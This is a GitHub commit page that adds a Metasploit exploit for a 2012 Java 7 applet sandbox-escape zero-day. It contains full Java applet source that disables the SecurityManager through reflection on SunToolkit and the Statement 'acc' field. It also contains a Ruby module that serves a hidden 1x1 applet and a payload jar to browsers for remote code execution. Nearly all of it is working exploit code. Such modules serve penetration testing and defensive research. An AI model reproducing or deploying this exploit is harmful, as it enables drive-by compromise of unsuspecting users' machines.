Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

Added java_jre17_exec

  • Loading branch information...
commit 52ca1083c22de7022baf7dca8a1756909f803341 1 parent b0661a3
jvazquez-r7 authored
View
BIN  data/exploits/CVE-2012-XXXX/Exploit.class
Binary file not shown
View
75 external/source/exploits/CVE-2012-XXXX/Exploit.java
@@ -0,0 +1,75 @@
+//
+// CVE-2012-XXXX Java 0day
+//
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
+
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.beans.Expression;
+import java.beans.Statement;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.Certificate;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+ public Exploit()
+ {
+ }
+
+ public void disableSecurity()
+ throws Throwable
+ {
+ Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
+ Permissions localPermissions = new Permissions();
+ localPermissions.add(new AllPermission());
+ ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
+ AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
+ localProtectionDomain
+ });
+ SetField(Statement.class, "acc", localStatement, localAccessControlContext);
+ localStatement.execute();
+ }
+
+ private Class GetClass(String paramString)
+ throws Throwable
+ {
+ Object arrayOfObject[] = new Object[1];
+ arrayOfObject[0] = paramString;
+ Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
+ localExpression.execute();
+ return (Class)localExpression.getValue();
+ }
+
+ private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
+ throws Throwable
+ {
+ Object arrayOfObject[] = new Object[2];
+ arrayOfObject[0] = paramClass;
+ arrayOfObject[1] = paramString;
+ Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
+ localExpression.execute();
+ ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
+ }
+
+ public void init()
+ {
+ try
+ {
+ disableSecurity();
+ Payload.main(null);
+ }
+ catch(Throwable localThrowable)
+ {
+ localThrowable.printStackTrace();
+ }
+ }
+
+ public void paint(Graphics paramGraphics)
+ {
+ paramGraphics.drawString("Loading", 50, 25);
+ }
+}
View
118 modules/exploits/multi/browser/java_jre17_exec.rb
@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+ super( update_info( info,
+ 'Name' => 'Java 7 Applet Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
+ Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
+ no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
+ and Firefox across different platforms.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Discovery
+ 'jduck', # metasploit module
+ 'sinn3r', # metasploit module
+ 'juan vazquez', # metasploit module
+ ],
+ 'References' =>
+ [
+ #[ 'CVE', '' ],
+ #[ 'OSVDB', '' ],
+ [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
+ [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win'
+ }
+ ],
+ [ 'Linux x86',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Aug 26 2012'
+ ))
+ end
+
+
+ def on_request_uri( cli, request )
+ if not request.uri.match(/\.jar$/i)
+ if not request.uri.match(/\/$/)
+ send_redirect(cli, get_resource() + '/', '')
+ return
+ end
+
+ print_status("#{self.name} handling request")
+
+ send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+ return
+ end
+
+ paths = [
+ [ "Exploit.class" ]
+ ]
+
+ p = regenerate_payload(cli)
+
+ jar = p.encoded_jar
+ paths.each do |path|
+ 1.upto(path.length - 1) do |idx|
+ full = path[0,idx].join("/") + "/"
+ if !(jar.entries.map{|e|e.name}.include?(full))
+ jar.add_file(full, '')
+ end
+ end
+ fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
+ data = fd.read(fd.stat.size)
+ jar.add_file(path.join("/"), data)
+ fd.close
+ end
+
+ print_status("Sending Applet.jar")
+ send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+ handler( cli )
+ end
+
+ def generate_html
+ html = "<html><head></head>"
+ html += "<body>"
+ html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+ html += "</applet></body></html>"
+ return html
+ end
+
+end
Please sign in to comment.
Something went wrong with that request. Please try again.